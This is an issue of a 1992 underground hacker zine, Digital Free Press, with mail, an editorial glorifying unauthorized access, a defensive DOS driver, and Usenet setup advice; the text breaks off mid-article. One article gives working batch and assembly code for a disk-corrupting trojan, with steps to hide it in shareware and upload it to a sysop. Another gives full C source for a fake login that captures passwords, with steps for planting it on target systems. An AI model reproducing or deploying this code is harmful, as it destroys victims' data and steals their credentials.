home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Digital Free Press / dfp-1.2 < prev    next >
Text File  |  1999-01-28  |  52KB  |  1,282 lines

  1.  
  2.               #########             ############       #########
  3.               ###########           ############       ###########
  4.               ####    ####          ####               ####    ####
  5.               ####    ####          ####               ####    ####
  6.               ####    ####          ########           ###########
  7.               ####    ####          ########           #########
  8.               ####    ####          ####               ####
  9.               ####    ####          ####               ####
  10.               ###########           ####               ####
  11.               #########             ####               ####
  12.  
  13.                             DIGITAL FREE PRESS
  14. -------------------------------------------------------------------------------
  15.                     Volume 1.0                Issue 2.0
  16. -------------------------------------------------------------------------------
  17.  
  18.        * A Publication of The Underground Computing Foundation (UCF) *
  19.  
  20.             * Send Submissions to: hackers%underg@uunet.uu.net *
  21.  
  22.               * Editor: Max Cray (max%underg@uunet.uu.net) *
  23.  
  24.               * BBS: The Underground (401) 847-2603 (v.32) *
  25.  
  26. ------------------------------------------------------------------------------
  27.  
  28.                     Statement of Purpose and Disclaimer
  29.  
  30.     The Digital Free Press is an uncensored forum to document current
  31. activities in and of the world of modern technology. It is published under the
  32. premise that it is better to know, rather than not know, so no attempt is made
  33. to hide any information no matter how dangerous it may be. Information is a
  34. double edged sword. It is neither good nor bad, and can be used for either
  35. good or bad. Warning: Some information in this document could be used for
  36. illegal activities. Use at your own risk. Articles are the opinion of the
  37. authors listed, and not of the editor (unless of course the editor wrote
  38. it).
  39.  
  40. ------------------------------------------------------------------------------
  41. In this Issue:
  42.  
  43.     1. Mail to Max
  44.     2. Editorial: Old 'Hackers' vs. New 'Hackers' - Max Cray
  45.     3. A Tour of The Underground Computing Foundation BBS - Max Cray
  46.     4. Protection of DOS Devices - GodNet Raider
  47.     5. Overwriting Trojan - The BBC
  48.     6. Breaches of Security - The Joker
  49.     7. Getting on Usenet - Max Cray
  50.     8. The BBC's Crash House (Fun with ANSI.SYS) - The BBC
  51.  
  52. ------------------------------------------------------------------------------
  53. Mail to Max:
  54. ------------------------------------------------------------------------------
  55. Date: Tue, 31 Dec 91 23:49:32 -0500
  56. From: <Irate Upstream Sysadmin>
  57. X-Mailer: Mail User's Shell (7.2.2 4/12/91)
  58. To: underg!ccn
  59. Subject: digital free press
  60.  
  61. While investigating a problem with the mail and uucp queues on my system I
  62. discovered a message from you entitled "DIGITAL FREE PRESS Volume 1 Issue 1".
  63. The majority of this message gave details for activities that I consider to
  64. be either illegal or primarily malicious in nature.  As such, I refuse to
  65. have my computer system be involved in any way in the distribution of this
  66. material.  I realize that some people, perhaps including yourself, might
  67. construe this action as restricting the freedom of the press but rest
  68. assured that this is not the case.  I am in no way usurping your rights to
  69. say anything that you want to say, I am only refusing to help pay for it.
  70.  
  71. I will phone your system one last time to deliver this letter and then I
  72. will sever the uucp link.  If you wish to discuss this matter with me you
  73. may call me either at work during the day or at home in the evening.
  74. If I do not hear from you within two weeks I will return the unused portion
  75. of your $50.
  76.  
  77. --
  78. <Irate Upstream Sysadmin>
  79. %% Can I be excused, my brain is full. **
  80. --
  81. [Editor's note: Lesson here is be sure you know your upstream sysadmin's
  82. policy on distribution of controversial material. I was able to get the uucp
  83. connection back, but only after agreeing not to distribute DFP anymore
  84. through his site.]
  85. ----------------------------------------------------------------------------
  86. Date: Thu, 2 Jan 92 20:39:09 CST
  87. From: <Irate Pseudo Hacker>
  88. To: max@underg
  89. Subject: Re: DIGITAL FREE PRESS Volume 1 Issue 1
  90. Newsgroups: alt.hackers
  91. Organization: :noitazinagrO
  92.  
  93. You obviously have no idea about what alt.hackers is about, to refresh your
  94. memory, enclosed is a copy of an article you should have read earlier, but
  95. knowing your type, probably didn't.  please note that it EXPLICITLY states
  96. that this is not a forum for elitoid DOS pirate dumbshit WEENIES who like to
  97. call themselves "hackers". go back to WWIVnet or Celeritynet or whatever
  98. pirate-net it is that people like you use nowadays, asshole.
  99.  
  100. [alt.hackers FAQ deleted]
  101.  
  102. P.S.  Please do not post this type of material here again.
  103. --
  104. <Irate Pseudo Hacker>
  105. --
  106. [Editor's note: How can this person hope to influence people by being so
  107. confrontational? In fact the response I got from the first issue of DFP was
  108. about 90% positive, and there were many requests to be put on the mailing
  109. list. Thanks for your support, and please keep the mail coming!]
  110.  
  111. ------------------------------------------------------------------------------
  112. ------------------
  113. | Article 2 of 8 |    EDITORIAL
  114. ------------------
  115.                               Real Hackers?
  116.  
  117.     There is a lot of talk these days about how the word 'hacker' has been
  118. redefined by the press. The theory is that the old hackers, as portrayed in
  119. Steven Levy's excellent book _Hackers: Heroes of the Computer Revolution_,
  120. were good and pure and this breed of hacker dramatized in the press is some
  121. new evil non-hacker terrorist. This is nonsense.
  122.  
  123.     According to the book, the hacker ethic(paraphrased) is as follows:
  124.  
  125.     1. Access to computers should be unlimited and total.
  126.  
  127.     2. All information should be free.
  128.  
  129.     3. Mistrust Authority - Promote Decentralization.
  130.  
  131.     4. Hackers should be judged by their hacking.
  132.  
  133.     5. You can create art and beauty on a computer.
  134.  
  135.     6. Computers can change your life for the better.
  136.  
  137.     In pursuit of the hacker ethic these heroes performed various acts that
  138. would not be looked upon favorably in today's anti-hacker society:
  139.  
  140. Used Equipment Without Authorization (Page 20)
  141. ----------------------------------------------
  142.  
  143.     "    So, without any authorization whatsoever, that is what Peter Sampson
  144.      set out to do, along with a few friends of his from an MIT organization
  145.      with a special interest in model railroading. It was a casual, unthinking
  146.      step into a science-fiction future, but that was typical of the way that
  147.      an odd subculture was pulling itself up by its bootstraps and growing to
  148.      underground prominence-to become a culture that would be the impolite,
  149.      unsanctioned soul of computerdom. It was among the first computer
  150.      hacker escapades of the Tech Model Railroad Club, or TMRC."
  151.  
  152. Phone Phreaked (Page 92)
  153. ------------------------
  154.  
  155.     "He had programed some appropriate tones to come out of the speaker and
  156.      into the open receiver of the campus phone that sat in the Kluge room.
  157.      These tones made the phone system come to attention, so to speak, and
  158.      dance."
  159.  
  160. Modified Equipment Without Authorization (Page 96)
  161. --------------------------------------------------
  162.  
  163.     "    Nelson thought that adding an 'add to memory' instruction would
  164.      improve the machine. It would take _months_, perhaps, to go through
  165.      channels to do it, and if he did it himself he would learn something
  166.      about the way the world worked. So one night Stewart Nelson spontaneously
  167.      convened the Midnight Computer Wiring Society."
  168.  
  169. Circumvented Password Systems (Page 417)
  170. ----------------------------------------
  171.  
  172.     "Stallman broke the computer's encryption code and was able to get
  173.      to the protected file which held people's passwords. He started
  174.      sending people messages which would appear on screen when they
  175.      logged onto the system:
  176.  
  177.         'I see you chose the password [such and such]. I suggest that
  178.          you switch to the password "carriage return." It's much
  179.          easier to type, and also it stands up to the principle that
  180.          there should be no passwords.'
  181.  
  182.     'Eventually I got to the point where a fifth of all the users on
  183.      the machine had the Empty String password.' RMS later boasted.
  184.      Then the computer science laboratory installed a more sophisticated
  185.      password system on its other computer. This one was not so easy for
  186.      Stallman to crack. But Stallman was able to study the encryption
  187.      program, and as he later said, 'I discovered changing one word in
  188.      that program would cause it to print out your password on the system
  189.      console as part of the message that you were logging in.' Since
  190.      the 'system console' was visible to anyone walking by, and its
  191.      messages could easily be accessed by any terminal, or even printed
  192.      out in hard copy, Stallman's change allowed any password to be
  193.      routinely disseminated by anyone who cared to know it. He thought
  194.      the result 'amusing.'
  195.  
  196.     Certainly these hackers were not anarchists who wanted only to destroy.
  197. They had a personal code of ethics, the hacker ethic to base their behavior
  198. on. In fact the modern hacker has his/her ethics intact. Compare the above
  199. hacker ethic with the hacker ethic found in _Out of the Inner Circle_ by
  200. Bill 'The Cracker' Landreth, a teenager arrested by the FBI (Page 18,60):
  201.  
  202.     1. Never delete any information you can not easily restore.
  203.  
  204.     2. Never leave any names on a computer.
  205.  
  206.     3. Always try to obtain your own information.
  207.  
  208.     The common denominator to these ethics systems are the respect for
  209. technology, and the personal growth through free access and freedom of
  210. information. Certainly the attitude towards private property is the same.
  211. Accessing and using equipment that you do not own is okay as long as
  212. you do not prevent those who own it from using it, or damage anything.
  213.  
  214.     With respect to the hacker ethic the hackers mentioned in _Cyberpunk:
  215. Outlaws and Hackers on the Computer Frontier_ by Katie Hafner and John
  216. Markoff were in fact good hackers. If free access, and free information
  217. were the law of the land would Kevin Mitnick have gone to jail? I do not
  218. think so. Sure he got the source code for VMS, but is there any evidence
  219. that he used this information for personal gain, or did he simply use the
  220. information to improve his understanding of the VMS operating system?
  221.  
  222.     Robert T. Morris's worm program was a clever hack. Of course he 'gronked'
  223. it by programming the replication rate much too fast, but still there is no
  224. evidence that he had any intention of doing harm to the system. It was simply
  225. a computer experiment. Who owns the Internet? Is it some mysterious 'them'
  226. or is it our net? If it is out net, then we should be able to try some stuff
  227. on it, and to heck with 'them' if they can't take a joke.
  228.  
  229.     Of course the German hackers are a different story. What they got in
  230. trouble for was espionage, and not hacking, which is a breach of faith,
  231. and is hacking for personal gain. However selling Minix to the KGB almost
  232. makes it forgivable...
  233.  
  234.     It is my contention that hackers did not change. Society changed, and it
  235. changed for the worse. The environment the early hackers were working in
  236. correctly viewed these activities as the desire to utilize technology in a
  237. personal way. By definition hackers believe in the free access to computers
  238. and to the freedom of information. If you do not believe in these principles
  239. you are not a hacker, no matter how technologically capable you are. You
  240. are probable just a tool for the greed society. Current bad mouthing of
  241. hackers is simply snobbery. Rather than cracking down on the modern hacker, we
  242. should reinforce the hacker ethic, a code of conduct not based upon greed and
  243. lust for the almighty dollar, but instead for personal growth through the free
  244. access of computers and information, and a respect for technology.
  245.  
  246. It is the humane thing to do.
  247.  
  248. ------------------------------------------------------------------------------
  249. ------------------
  250. | Article 3 of 8 |
  251. ------------------
  252.  
  253.               A Tour of the Underground Computing Foundation BBS
  254.                                 by Max Cray
  255.  
  256.     I have noticed a lot of people call The UCF BBS and are unable to find
  257. the good stuff, so let me take the opportunity to point out a few of the
  258. high spots. First of all it is connected to the Usenet. Your international
  259. e-mail address would be <username>%underg@uunet.uu.net. With this address
  260. you can subscribe to all the good stuff like Phrack and NIA. There is also
  261. a mailing list: hackers%underg@uunet.uu.net. E-mail me if you want to be
  262. included on the list.
  263.      You can participate in the Usenet newsgroups, of which alt-cud-digest
  264. is a must. alt.dcom.telecom is an outstanding resource for those interested
  265. in the telephone network. There is vast amounts of very technical information
  266. that passes through on a daily basis. Far too much to read it all. Type
  267. USENET at the prompt to see all the newsgroups. Type in the name of the group
  268. you want, and then type the READ command. Type the number of the first
  269. message you want to read. If you call often you will want to configure your
  270. NEW message scan using the JOIN command. Type ? at the prompt to get help.
  271. There is a more local network set up, which has a newsgroup called ri.cug.
  272. This is the Rhode Island Computer Underground, and it contains info on the
  273. local scene around here.
  274.     If you are interested in journals type INFO. I try to keep the latest
  275. issues of NIA, PHRACK, CUD, EFFector, and other journals here. If you are
  276. interested in back issues go into the files section and LOG into the directory
  277. /public/text. You can view or download text philes here. There is also some
  278. stuff of interest in the /public/hacks directory. The /public/comm directory
  279. contains subdirectories for the WAFFLE philes, and UUPC philes that you may
  280. need to connect to the UUCP network.
  281.     Sorry there are no codez as it is an information board and not a pirate
  282. board.
  283.  
  284. ------------------------------------------------------------------------------
  285. ------------------
  286. | Article 4 of 8 |
  287. ------------------
  288.                       -=[ Protection of DOS devices ]=-
  289.  
  290.                                      -or-
  291.  
  292.                   /*******************************************/
  293.                   /* Unarc, Unzip, Lha extract, and be merry */
  294.                   /*         for tomorrow we may lock.       */
  295.                   /*******************************************/
  296.  
  297.                                 - written by -
  298.                                  GodNet Raider
  299.                                     - of -
  300.                              The CyberUnderground
  301.  
  302.  -=[ "Information is the greatest weapon of power to the modern wizard." ]=-
  303.  
  304. ]----------------------------------------------------------------------------[
  305.  
  306. Introduction:
  307. -------------
  308.  
  309.     This phile is written in response to the practice of misusing using
  310. MS-DOS devices (ie.. to make archive bombs). The following will explain the
  311. problem and some of the possible solutions. Also included is an ASM source
  312. that will remap the 'CLOCK$' device to a 'NUL' (basic bit bucket) type
  313. device.
  314.  
  315. The problem:
  316. ------------
  317.  
  318.     In a never ending attempt of OS designers to mask the inner workings
  319. of system hardware, the idea of device drivers comes into play. A device
  320. driver is basically an attempt to standardize I/O with the systems' hardware.
  321. Thus allowing access to every thing from keyboards to CD ROMS without an
  322. in depth knowledge of the physical hardware involved.
  323.  
  324.     This ideal is valid and of great help in program development, yet when
  325. the drivers are not well defined there is the tendency for them to cause
  326. more harm then good. A case in point is the 'CLOCK$' device in MS-DOS.
  327.  
  328.     'CLOCK$' is a driver designed to allow updating of the CMOS clock.
  329. It passes data direct to the CMOS clock with out buffering or any attempt
  330. at error checking. Thereby passing valid data as well as invalid. An with
  331. no internal mechanism to detect an overflow condition/not sending EOF after
  332. a read will tend to hang systems/knock out the date and time stored in the
  333. CMOS clock. This problem has come of use to the hacker community.
  334.  
  335.     Several methods of the assault have been:
  336.  
  337.         1)    Uploading 'CLOCK$.*' files to remote systems.
  338.  
  339.         2)    Using BBS archiveing utilities to create 'CLOCK$.*'
  340.                         files for download.
  341.  
  342.         3)    Low level disk editing of archive files to rename files
  343.                         in it to 'CLOCK$.*'
  344.  
  345. Some possible solutions:
  346. ------------------------
  347.  
  348.     Of the solutions available none are complete. There are benefits and
  349. disadvantages to each. Nor is the following a complete list, it is only
  350. an attempt to discus some of the common ones.
  351.  
  352.     Abstinence:
  353.         Not excepting/expanding archive files on ones system. This is
  354.                 the most undesirable but most effective and is only listed
  355.                 'for abstinence makes the heart grow fonder'.
  356.  
  357.     Scanning archives:
  358.         Most archive programs come with a utility to view the files
  359.                 stored in a given archive (lha v foobar.lzh). The only real
  360.                 drawback is having to take the time to scan archives. This
  361.                 does not protect from BBS's that create real time archives,
  362.                 extract to check for virus batches (with out looking thought
  363.                 the archive first), uploads of 'CLOCK$.*' files, and programs
  364.                 that create and write to a 'CLOCK$.*' file.
  365.  
  366.     Updating programs:
  367.         Getting new versions of programs that watch for 'CLOCK$.*' and
  368.         avoid creating/writing to said file is a problem in that you
  369.         must wait for the author to come up with the fix and have to
  370.                 pay for the update. Another reason for software makers to
  371.                 release code with their programs.
  372.  
  373.     TSR protection programs:
  374.         Other than yet another drain on precious RAM and clock time.
  375.                 Can only protect from programs that create files though
  376.                 interrupts. Pipes and redirects may slip though the cracks.
  377.  
  378.     LOW LEVEL disk editing of io.sys files:
  379.         Renaming the 'CLOCK$' device is a method that will protect on
  380.                 all levels but may cause some programs to hang that use it.
  381.                 Also to replace it is not easy for you must reedit the file
  382.                 (without moving it). It should also be noted that the new name
  383.                 MUST be the same size as the original (6 letters).
  384.  
  385.     Creation of a new 'CLOCK$' device:
  386.         This offers the protection of the above method with out the
  387.                 need of changing OS binary files and to allow/disallow the
  388.                 ORIGINAL 'CLOCK$' device by editing the config.sys file
  389.                 instead. One disadvantage is that update of the CMOS clock
  390.                 though 'CLOCK$' is stoped. Yet the BIOS clock is still
  391.                 accessible and the CMOS clock can be updated though the BIOS
  392.                 setup routine or programs that write direct to CMOS. Source
  393.                 for a simple null mask clock device driver is provided below
  394.                 and can be use as a template to create your own 'CLOCK$'
  395.                 replacement.
  396.  
  397.     There are other solutions to this problem not listed here.
  398.  
  399. Clock$ null device Source Code:
  400. -------------------------------
  401.  
  402.     The following ASM code is for a DOS device driver that will replace
  403. the existing 'CLOCK$' device when added to the config.sys file
  404. (device=outclock.sys).
  405.  
  406.     The key points of the device are:
  407.  
  408.         1)    The line - DW 8080h. This tells the device loader that
  409.                         outclock wishes to replace the present clock device
  410.                         with it's self. This will trap all internal calls and
  411.                         to redirect any calls to the new driver.
  412.  
  413.         2)    The line - DB 'CLOCK$  '. This will setup the device
  414.                         to trap external access though pipes, indirects, file
  415.                         I/O, and IOCTL's.
  416.  
  417.         3)    The device strategy is to simply ignore all incoming
  418.                         commands to the device (standard practice for the
  419.                         'NUL' device).
  420.  
  421.     This driver does not prevent access to the CMOS clock except though
  422. the CLOCK$ device. So it will not effect the running of programs EXCEPT
  423. those that try to update the CMOS clock though the this device.
  424.  
  425.  +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
  426.  
  427. CSEG    segment public 'CODE'
  428.         org 0
  429.         assume CS:CSEG, DS:CSEG, ES:CSEG
  430. DEVICE        proc far
  431.             DD 0ffffffffh        ;------------------------------;
  432.             DW 8080h        ; The following 5 definitions  ;
  433.             DW DEV_STRATEGY        ; 18 (bytes) MUST be at offset ;
  434.             DW DEV_INTERRUPT    ; 0 in the binary file.        ;
  435.             DB 'CLOCK$  '        ;------------------------------;
  436. KEEP_ES        DW ?
  437. KEEP_BX        DW ?
  438. FUNCTIONS    label word
  439.             DW INIT
  440.             DW CHK_MEDIA
  441.             DW MAKE_BPB
  442.             DW IOCTL_IN
  443.             DW INPUT_DATA
  444.             DW NONDSTRCT_IN
  445.             DW INPUT_STATUS
  446.             DW CLEAR_INPUT
  447.             DW OUTPUT_DATA
  448.             DW OUTPUT_VERIFY
  449.             DW OUTPUT_STATUS
  450.             DW CLEAR_OUTPUT
  451.             DW IOCTL_OUT
  452.  
  453. DEV_STRATEGY:
  454.             mov CS:KEEP_ES, ES
  455.             mov CS:KEEP_BX, BX
  456.             ret
  457.  
  458. DEV_INTERRUPT:
  459.             push ES
  460.             push DS
  461.             push AX
  462.             push BX
  463.             push CX
  464.             push DX
  465.             push SI
  466.             push DI
  467.             push BP
  468.             mov AX, CS:KEEP_ES
  469.             mov ES, AX
  470.             mov BX, CS:KEEP_BX
  471.             mov ES:word ptr [BX] + 3, 0000h
  472.             mov AL, ES:[BX] + 2
  473.             shl AL, 1
  474.             xor AH, AH
  475.             lea DI, FUNCTIONS
  476.             add DI, AX
  477.             jmp word ptr [DI]
  478.  
  479. INIT:
  480.             lea AX, E_O_P
  481.             mov ES:word ptr [BX] + 14, AX
  482.             mov ES:word ptr [BX] + 16, CS
  483.             jmp short QUIT
  484.  
  485. INPUT_STATUS:
  486. KEY_READY:
  487. NONDSTRCT_IN:
  488. INPUT_DATA:
  489. OUTPUT_DATA:
  490. OUTPUT_VERIFY:
  491. CHK_MEDIA:
  492. MAKE_BPB:
  493. IOCTL_IN:
  494. IOCTL_OUT:
  495. OUTPUT_STATUS:
  496. CLEAR_OUTPUT:
  497. CLEAR_INPUT:
  498. QUIT:
  499.             or ES:word ptr [BX] + 3, 0100h
  500.             pop BP
  501.             pop DI
  502.             pop SI
  503.             pop DX
  504.             pop CX
  505.             pop BX
  506.             pop AX
  507.             pop DS
  508.             pop ES
  509.             ret
  510. E_O_P:
  511. DEVICE        endp
  512. CSEG        ends
  513.             end    DEVICE
  514.  
  515.  +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
  516.  
  517. ]============================================================================[
  518.  
  519.  underg!tsf!gnr@uunet.uu.net (GodNet Raider)
  520.          -=[ "You gotta learn to listen, before you learn to play." ]=-
  521.  
  522. ------------------------------------------------------------------------------
  523. ------------------
  524. | Article 5 of 8 |
  525. ------------------
  526.  
  527. To: hackers@underg.UUCP
  528. Subject: Text phile 2
  529. From: bbc@tsf.UUCP (The BBC)
  530. Organization: The CyberUnderground
  531.  
  532.     Welcome class... An now... for another lesson in the misuse of
  533. computers...
  534.  
  535.     So you thought that INJECT.BAT was fun... But you did not like
  536. the idea of making the injection give the fun away by causing the
  537. host program to crash after the trojan ran... Well then lets get a
  538. little more sophisticated then... Now rather than overwriting the
  539. existing host code lets just... Oooooh... Say... Add a new function
  540. to an existing program... Now what to add... Something
  541. destructive???? Why not...
  542.  
  543.     Ok How about a bit o' code that just moves the absolute disk
  544. write interrupt to the clock interrupt... Then each time the clock
  545. ticks (about 18 times a second) the computer attempts a disk write
  546. with random data... Good way to test THOSE ol' ALT-CTRL-DEL
  547. reflexes... Oooooh... What fun, it is to crash, in a one drive
  548. nonbacked-up system...
  549.  
  550.     Well now for the fun part...
  551.  
  552.     Step 1:
  553.  
  554.         Make a batch file called "ADDON.BAT" an in it place
  555.         the following commands -
  556.  
  557.         =============================================================
  558.          echo off
  559.          cls
  560.          rename %2 ~~temp2.~tp > nul
  561.          copy %1+~~temp2.~tp %2 /b > nul
  562.          erase ~~temp2.~tp > nul
  563.         =============================================================
  564.  
  565.     Step 2:
  566.  
  567.         Make a ASM file called "TROJAN.ASM" an in it place the
  568.         following -
  569.  
  570.         =============================================================
  571.          PROGSEG    segment para public 'CODE'
  572.              assume CS:PROGSEG
  573.          DOIT    proc
  574.                  wSaveDS dw 9090h   ; Store old DS register here...
  575.                  mov AX, DS
  576.                  mov CS:wSaveDS, AX ; Save DS address for hosts'
  577.                                     ;     use...
  578.  
  579.                  ;-------------- v Place Trojan Here v -------------;
  580.  
  581.                  mov AX, 3526h ; Get DOS absolute write interrupt...
  582.                  int 21h
  583.                  mov DX, BX    ; Set clock interrupt to returned
  584.                                ;     value...
  585.                  mov AX, ES
  586.                  mov DS, AX
  587.                  mov AX, 2508h
  588.                  int 21h
  589.                  xor BX, BX   ; Rezap used registers [other than
  590.                               ;    AX/DS/ES]...
  591.                  xor CX, CX
  592.                  xor DX, DX
  593.  
  594.                  ;--------------- ^ Place Trojan Here ^ ------------;
  595.  
  596.                  mov AX, CS:wSaveDS   ; Restore DS, ES registers for
  597.                                       ;     host...
  598.                  mov DS, AX
  599.                  mov ES, AX
  600.                  xor AX, AX
  601.          DOIT    endp                 ; Host will start after this
  602.                                       ;     point...
  603.          PROGSEG ends
  604.                  end
  605.         =============================================================
  606.  
  607.     Step 3:
  608.  
  609.         Then assemble and link the trojan file. Use exe2bin [or
  610.         whatever utility you have to convert .EXEs to .COM format]
  611.         to make a .COM file out of TROJAN.EXE.....
  612.  
  613.     Step 4:
  614.  
  615.         Then copy a *.COM file into the same directory. Should
  616.         be part of some shareware thing that the target sysop would
  617.         like. With docs an all... would not want them to get
  618.         suspicious, now would we.............
  619.  
  620.     Step 5:
  621.  
  622.          Run the following command from the dos prompt...
  623.  
  624.              ADDON <Trojan file> <COM file to add trojan to>
  625.  
  626.     Step 6:
  627.  
  628.        Upload the mess to the unsuspecting sysop and watch the fun!
  629.  
  630.  
  631.     See and you thought hacking was hard...... Of course if they
  632. get smug and start searching for the added code.... We'll just have
  633. to add extra code (nops' ect) and/or switching some of the code
  634. around in the ASM file...
  635.  
  636. 'Another fine mess' from...
  637. The BBC
  638.  
  639. ---------------------------------------------------------------------
  640.  ...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC)
  641.              -=[ "Anarchy is never HAVING to say you're sorry." ]=-
  642.  
  643. ------------------------------------------------------------------------------
  644. ------------------
  645. | Article 6 of 8 |
  646. ------------------
  647.  
  648.                                                         Breaches of Security
  649.                                                                           by
  650.                                                                    The Joker
  651.                                                        ----------------------
  652.  
  653.     Hello loves, Here we are with yet another page from the _Tomb of
  654. Ultimate Evil_ (THOSE of good aliment must make a saving throw against
  655. neophytedom).
  656.  
  657.     Todays chat is on the subject of collecting passwords, not that anyone
  658. here would have nothing but nobel reasons to do such a thing. An in
  659. this wonderfully wacky world of networks, UNIX, and VMS it's just the in
  660. t'ing to do. So now boys and girls, hacks and hacketts, Rocky and
  661. bullwinkel let us begin.
  662.  
  663.     Ah, what a tangled web we weave when first we practice to deceive...
  664. Yet how easy it makes it to get what we want. An deception is the key
  665. here. For thanks to the simple format of most logins (name, password...
  666. rank, serial number, underwear condition...). The simplicity of the answer
  667. makes it a wonderful little exercise in shell programming.
  668.  
  669.     What is needed is a simple program that pretends it's a login shell
  670. and is set like a little program beartrap. Sitting quietly, waiting
  671. for that most elusive of pray... The north american password! (An them's
  672. good eating too). So as we send our assistant into the system to wrestle
  673. and subdue the foul beasty, let us listen to a message from the good folks
  674. at Mutual of Omaha... Ooop sorry, instead let us look at a model of a simple
  675. password capture shell. What? You want the insurance commercial instead...
  676. Well, tough cookies.
  677.  
  678. |------------------------------[ Cut Line ]----------------------------------|
  679.  
  680. /*
  681.     LogTrap.c
  682.         (c) 1992 by Joculator inc., no rights reserved (or respected).
  683.             Rubber cell #182
  684.             Arkham Asylum
  685.             Gotham City
  686.  
  687.         Captures first login attempt by a user, to file (*szKeepFile),
  688.     then give phony error (*szPhonyError) and call real login shell
  689.     (*aszRealShell []). For the express purpose of promoting glorious
  690.     world chaos.
  691. */
  692.  
  693. #include <stdio.h>
  694. #include <stdlib.h>
  695. #include <process.h>
  696.  
  697. #define TRUE 1
  698. #define MAX_BUFFER 256
  699. #define ECHO 0
  700. #define NOECHO 1
  701. #define NEWLINE "\n"
  702. #define ANSI_CLS "\x1b[2J"
  703. #define ANSI_NOECHO "\x1b[8m                                        \x1b[40D"
  704. #define ANSI_ECHO "\x1b[0m"
  705.  
  706. struct
  707.     {
  708.      char
  709.         *szPrompt,
  710.         fNoEcho;
  711.     } *ptPrompts,
  712.       Prompts [] =  /* Prompts patterned after real login shell. */
  713.         {
  714.       /* [Prompt string], [ECHO | NOECHO] */
  715.          "Login: "      , ECHO,
  716.          "Password: "   , NOECHO,
  717.          NULL
  718.         };
  719.  
  720. char
  721.     *szPhonyError = "Invalid login.\n",    /* Error patterned after LOGIN. */
  722.     *aszRealShell [] =  /* Command to call real LOGIN. */
  723.         {
  724.          "LOGIN",
  725.           /* list parameters (if any) here */
  726.           NULL
  727.          },
  728.     *szKeepFile = "~tmp0167.tmp",   /* Save booty in... */
  729.     szWorkBuffer [MAX_BUFFER];
  730.  
  731. void
  732.     main (void);
  733.  
  734. void main (void)
  735. {
  736.     FILE
  737.         *OutStream;
  738.  
  739.     /* Cover our tracks. */
  740.     printf (ANSI_CLS);
  741.     /* Prompt for and save user information. */
  742.     for (ptPrompts = Prompts; ptPrompts->szPrompt; ptPrompts++)
  743.         {
  744.          printf (ptPrompts->szPrompt);
  745.          if (ptPrompts->fNoEcho)
  746.             printf (ANSI_NOECHO);
  747.          fgets (szWorkBuffer, MAX_BUFFER, stdin);
  748.          if (ptPrompts->fNoEcho)
  749.              printf (ANSI_ECHO);
  750.          /* If file error, ignore it but, don't try to write to file. */
  751.          if (OutStream = fopen (szKeepFile, "a"))
  752.             {
  753.              fputs (ptPrompts->szPrompt, OutStream);
  754.              fputs (szWorkBuffer, OutStream);
  755.             }
  756.          fclose (OutStream);
  757.         }
  758.     /* Stick tongue out, Naaaa... */
  759.     printf (szPhonyError);
  760.     /* Commit process suicide by running LOGIN shell on top of our process. */
  761.     /* It should not return (unlike a bad check). */
  762.     execvp (aszRealShell [0], &aszRealShell [1]);
  763.     /* if execvp () (it got to this point?), lock system. */
  764.     while (TRUE);
  765. }
  766.  
  767. |------------------------------[ Cut Line ]----------------------------------|
  768.  
  769.     So there you have it. Now all that is left to do is:
  770.  
  771.         1: Set Prompts [], *szPhonyError, and *aszRealShell [] to match the
  772.            LOGIN of the target system.
  773.  
  774.         2: Set *szKeepFile to where you want your ill gotten booty to go.
  775.  
  776.         3: Compile the whole mess.
  777.  
  778.         4: LOGIN to the target system and run the program. For more fun
  779.            place copies on more than one terminal, if possible, on the same
  780.            system.
  781.  
  782.         5: Run to your duck blind and wait for a user to spring your lil'
  783.            trap.
  784.  
  785.     That's it, have fun, And remember...
  786.         If someone offers you drugs, just say... Yo!
  787.  
  788. ----------------------------------------------------------------------
  789.  
  790.  ...uunet!rayssd!galaxia!underg!tsf!joker (The Joker)
  791.        -=[ "All it takes is one bad day, then maddness has its way." ]=-
  792.  
  793. ------------------------------------------------------------------------------
  794. ------------------
  795. | Article 7 of 8 |
  796. ------------------
  797.  
  798.                            Getting on Usenet
  799.                               by Max Cray
  800.  
  801.     Much of the information from this phile comes from the excellent text
  802. phile INTRO.DOC that comes with the Waffle BBS package. Other information
  803. was gained from various books, and postings on the net itself, especially
  804. the FAQs (Frequently Asked Questions) postings in news.answers, and also my
  805. personal experience.
  806.  
  807.     Before you actually connect your machine to Usenet, it may be easier
  808. for you to learn about Usenet, and what it can do for you, by calling a
  809. BBS that is connected to Usenet. Good choices would be my own Underground,
  810. or any of the systems listed in the *nixpub. This is a document regularly
  811. posted to the Usenet listing all known unix bbs systems. You can get a copy
  812. of this from my bbs or from the following sources:
  813.  
  814.             o  anonymous uucp from jabber.
  815.                     +1 215 348 9727 [Telebit access]
  816.                     LOGIN: nuucp  NO PWD   [no rmail permitted]
  817.                 this list: /usr/spool/uucppublic/nixpub.short
  818.                 long list: /usr/spool/uucppublic/nixpub
  819.             o  "*NIX Depot" BBS on jabber.
  820.             o  USENET, regular posts to:
  821.                     comp.misc
  822.                     alt.bbs
  823.             o  the nixpub electronic mailing list.
  824.                     to be included or deleted from this distribution,
  825.                     send mail to nixpub-list-request@ls.com.
  826.             o  anonymous ftp from GVL.Unisys.COM [128.126.220.102]
  827.                     under ~/pub/nixpub/{long,short}
  828.             o  archive server from cs.widener.edu.
  829.                 mail to archive-server@cs.widener.edu
  830.                 Subject: or body of
  831.                     send nixpub long
  832.                  or
  833.                     send nixpub short
  834.                  or
  835.                     send nixpub long short
  836.                  or even
  837.                     index nixpub
  838.  
  839.     I will talk more about anonymous uucp, mailing lists, and archive servers
  840. in a minute.
  841.  
  842. UUCP SOFTWARE
  843.  
  844.     The first thing you need to connect your machine to the Usenet is
  845. software, and the first choice would be a version of the unix operating system
  846. itself. In fact to get a copy of the real thing is not that expensive anymore.
  847. As of this writing Consensys Corporation (1301 Pat Booker Rd., Universal City,
  848. TX, 78148, 1-800-387-8951) has UNIX System V Release 4 (the latest) including
  849. C development, Networking, and X Windows, for 386+ systems for $495. Certainly
  850. a big chunk of change, but a great deal for what you get. If cost is important
  851. you might try Coherent by Mark Williams Company (60 Revere Dr., Northbrook,
  852. IL. 60062, 1-800-627-5967). This is a less robust unix clone os that should
  853. run on any pc compatible computer. The price is right at $100. If you just
  854. want uucp connectivity, but you don't want to switch to a real operating
  855. system, then you might want to check out the Waffle BBS package. It can be
